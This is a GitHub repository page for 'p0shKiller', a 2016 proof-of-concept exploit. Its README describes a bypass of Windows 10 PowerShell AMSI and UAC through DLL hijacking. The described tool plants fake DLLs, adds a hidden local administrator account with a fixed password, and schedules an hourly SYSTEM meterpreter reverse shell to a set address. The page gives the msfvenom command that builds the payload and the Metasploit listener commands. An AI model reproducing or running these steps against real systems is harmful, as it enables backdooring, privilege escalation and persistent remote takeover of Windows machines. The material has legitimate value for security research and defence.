Skip to content
No description, website, or topics provided.
C++ Python C
Branch: master
Clone or download
Latest commit c9da839 May 27, 2016
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
Amsi First Commit May 26, 2016
MPAmsiRun
Powershell First Commit May 26, 2016
UacBypass
ntwdblib First Commit May 26, 2016
.gitattributes Initial commit to add default .gitIgnore and .gitAttribute files. May 26, 2016
.gitignore
LICENSE
README.txt
XORMeter.py Readme May 26, 2016
p0shKiller.sln First Commit May 26, 2016

README.txt

       _______         .__     ____  __.__.__  .__                
______ \   _  \   _____|  |__ |    |/ _|__|  | |  |   ___________ 
\____ \/  /_\  \ /  ___/  |  \|      < |  |  | |  | _/ __ \_  __ \
|  |_> >  \_/   \\___ \|   Y  \    |  \|  |  |_|  |_\  ___/|  | \/
|   __/ \_____  /____  >___|  /____|__ \__|____/____/\___  >__|   
|__|          \/     \/     \/        \/                 \/       
						By Cn33liz - 2016

Windows 10 PowerShell5 - Amsi/UAC Bypass/Backdoor/Exploit using DLL Hijacking

Proof of Concept exploit to bypass Microsoft latest AntiMalware Scan Interface technology within PowerShell5 on Windows 10.
With this exploit/patch applied, you can take control over powershells program flow by using DLL Hijacking and UAC Bypasstechniques. Every time powershell is started, a local admin named BadAss with password FacePalm01 will be added to the system (when run by an non elevated administrator account) 
and a reverse (SYSTEM) https meterpreter session (default 192.168.1.120) will be started every hour using a scheduled task.

Current status: 

* Reported to MSRC on 28-03-2016
* From Microsoft perspective AMSI/AntiVirus isn't a traditional security boundary. 

Requirements:

* A Windows 10 Box with latest security patches applied.
* Default UAC settings.
* Local administrator privileges to apply the patch (no need for elevation because Exploit uses UAC bypass to patch Amsi/Powershell).
* A remote https reversed meterpreter listener.
* A p0sh Fanboy that uses powershell on his system ;)

This Exploit contains 5 components (and 1 python script):

p0shKiller.exe	- The main tool to apply the Patch (only needed once).
UacBypass.dll	- Will be injected into explorer.exe process 
		  and uses IFileOperation (COM Interface) to copy needed DLL's (only needed once).
Amsi.dll	- This fake DLL is copied into: C:\Windows\System32\WindowsPowerShell\v1.0, 
		  and is the main vulnerable component. 
ntwdblib.dll	- Fake ntwdblib.dll copied into C:\Windows\System32, 
		  which is used by cliconfg.exe (elevated process) to bypass UAC.
MPAmsiRun.exe	- Xor'ed Meterpreter Shellcode payload that is copied into C:\Windows\System32 and called by Amsi.dll.

XORMeter.py	- Python Script to generate your own Meterpreter Payload (MPAmsiRun.exe) By @vvalien1

The following shellcode is used as payload and compiled within the code:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 EXITFUNC=thread -f hex > Shellcode.txt

Setup your remote msf listener:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set AutoRunScript post/windows/manage/priv_migrate
exploit -j

* Parts of this code has been borrowed from: https://github.com/hjc4869/UacBypass
You can’t perform that action at this time.